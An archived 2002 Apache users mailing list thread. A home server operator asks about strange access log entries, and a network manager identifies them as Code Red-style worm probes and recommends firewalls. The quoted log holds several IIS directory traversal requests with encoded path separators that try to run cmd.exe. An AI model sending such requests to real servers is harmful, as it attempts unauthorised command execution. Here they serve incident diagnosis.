httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Steve Leach" <sle...@askalix.com>
Subject Re: access log
Date Fri, 19 Apr 2002 09:18:09 GMT
Robert,

I am a bit tied up at the moment but will send a mail back to you when
free - in the meantime, if you are using Apache on Win32 - check out the
http://www.apache.org site regarding redirect.

You really should not be directly connected to the Internet without a
Firewall, I would also recommend that you check out:
http://www.firewall.com and
http://www.free-firewall.org/
or more from http://www.homenethelp.com/web/howto/free-firewall.asp

or you could use an old cheap PC and build one using Linux - try
http://www.linuxsecurity.com/articles/firewalls_article-4236.html or more
from
http://www.bolthole.com/solaris/firewall.html



Best Regards,

Steve Leach
Network Manager
Mi-Int Limited
Eaglescliffe Logistics Centre
Durham Lane
Egglescliffe
URL: http://www.askalix.com
TEL: 01642 356205
e-mail: sleach@askalix.com

----- Original Message -----
From: "Robert Douglass" <r.douglass@onlinehome.de>
To: <users@httpd.apache.org>
Sent: Friday, April 19, 2002 10:07 AM
Subject: Re: access log


> Steve,
> Thank you for the information. I'm not a trained system administrator, and
I
> have to admit, I don't know what you mean, "try some checks on the input
and
> redirect if you find any expoint attempts". I am on  a Win32 system (2000
> pro).
> -R.D.
> ----- Original Message -----
> From: "Steve Leach" <sleach@askalix.com>
> To: <users@httpd.apache.org>
> Sent: Friday, April 19, 2002 10:55 AM
> Subject: Re: access log
>
>
> > This is Code Red or something like it.
> > See the following: http://www.cert.org/advisories/CA-2001-19.html
> > Note that Apache should be fine - also that if you are running *nix you
> are
> > OK.
> > If on a Win32 system you could try some checks on the input and redirect
> if
> > you find any exploit attempts!!!
> >
> > Best Regards,
> >
> > Steve Leach
> > Network Manager
> > Mi-Int Limited
> > Eaglescliffe Logistics Centre
> > Durham Lane
> > Egglescliffe
> > URL: http://www.askalix.com
> > TEL: 01642 356205
> > e-mail: sleach@askalix.com
> >
> > ----- Original Message -----
> > From: "Robert Douglass" <r.douglass@onlinehome.de>
> > To: <users@httpd.apache.org>
> > Sent: Friday, April 19, 2002 9:43 AM
> > Subject: access log
> >
> >
> > > Hello, I've been hosting a tiny website from my home for the past
week,
> as
> > a
> > > temporary project, and I found the following in my access log:
> > >
> > > "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290
> > > "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 288
> > > "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> > > "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> > > "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
312
> > > "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> > > HTTP/1.0" 404 329
> > > "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> > > HTTP/1.0" 404 329
> > > "GET
> > >
> >
>
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
> > > stem32/cmd.exe?/c+dir HTTP/1.0" 404 345
> > > "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
311
> > > "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
311
> > > "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
311
> > > "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
311
> > > "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400
> 295
> > > "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400
295
> > > "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404
> > 312
> > > "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
312
> > >
> > > Does anybody have an idea what someone was trying to accomplish with
> this,
> > > or if these requests may have originated from my ISP? Does anybody
have
> > any
> > > suggestions on how to implement some basic security (I've done
nothing!)
> > to
> > > protect myself? I'm using Apache 1.3.22. Thank you,
> > >
> > > Robert Douglass
> > >
> > >
> > > ---------------------------------------------------------------------
> > > The official User-To-User support forum of the Apache HTTP Server
> Project.
> > > See <URL:http://httpd.apache.org/userslist.html> for more info.
> > > To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> > > For additional commands, e-mail: users-help@httpd.apache.org
> > >
> >
> >
> > ---------------------------------------------------------------------
> > The official User-To-User support forum of the Apache HTTP Server
Project.
> > See <URL:http://httpd.apache.org/userslist.html> for more info.
> > To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> > For additional commands, e-mail: users-help@httpd.apache.org
> >
>
>
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server Project.
> See <URL:http://httpd.apache.org/userslist.html> for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>


---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Mime
View raw message